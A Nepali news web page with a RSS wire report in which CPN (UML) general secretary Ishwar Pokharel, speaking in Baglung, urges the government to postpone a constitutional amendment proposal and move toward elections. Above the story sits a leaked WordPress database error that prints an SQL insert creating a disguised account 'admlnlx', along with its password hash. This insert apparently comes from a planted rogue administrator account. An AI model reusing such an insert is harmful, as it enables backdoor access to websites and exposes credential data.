WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2X6F3En0RPD68ILpU3yy7Z5LI5XPf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 09:23:54', '', 'admlnlx', 'admlnlx')
बागलुङ, पुस १० –
नेकपा (एमाले) का महासचिव ईश्वर पोखरेलले संसद्मा दर्ता भएको संशोधन प्रस्ताव स्थगन गर्नुपर्ने बताउनुभएको छ ।
प्रेस चौतारी नेपाल बागलुङ शाखाले आज आयोजना गरेको पत्रकार भेटघाटमा नेता पोखरलले संविधान संशोधन अहिलेको आवश्यकता नभएको उल्लेख गर्दै भन्नुभयो, “सरकारले संशोधन प्रस्ताव फिर्ता लिन नसक्ने हो भने स्थगित गरोस् । ”
उहाँले अहिलेको संशोधन प्रस्ताव राष्ट्रिय हितको प्रतिकूल रहेको जिकिर गर्दै संविधान संशोधनको विपक्षमा एमाले नरहेको तर अभ्यास, अनुभव र औचित्यका आधारमा मात्र संविधान संशोधन हुन सक्ने विचार राख्नुभयो । संशोधन प्रस्तावमा ल्याइएका भाषा, नागरिकता, प्रतिनिधित्व र सीमा हेरफेरसम्बन्धी बुँदामा एमाले सहमत हुन नसक्ने उहाँको भनाइ छ ।
“प्रदेशको सीमा हेरफेर हुनसक्छ, तर संवैधानिक व्यवस्था अनुसार हुनुपर्छ” नेता पोखरेलले भन्नुभयो “प्रदेशसभालाई मात्र त्यो अधिकार छ, संविधानको धारा २७४ मा त्यो स्पष्ट किटान गरिएको छ ।”
संशोधन प्रस्तावमा छलफल समेत हुन नदिइने बताउँदै नेता पोखरेलले सरकारलाई निर्वाचनको तयारीमा लाग्न आग्रह गर्नुभयो । “संशोधन प्रस्ताव स्थगन गरेर सरकारले मुलुकलाई निर्वाचनतिर लगोस्, एमाले पूर्ण रुपमा सहयोग गर्न तयार छ” पोखरेलले भन्नुभयो । निर्वाचनसँगै संविधान पनि कार्यान्वयनमा जाने उहाँको भनाइ छ । – रासस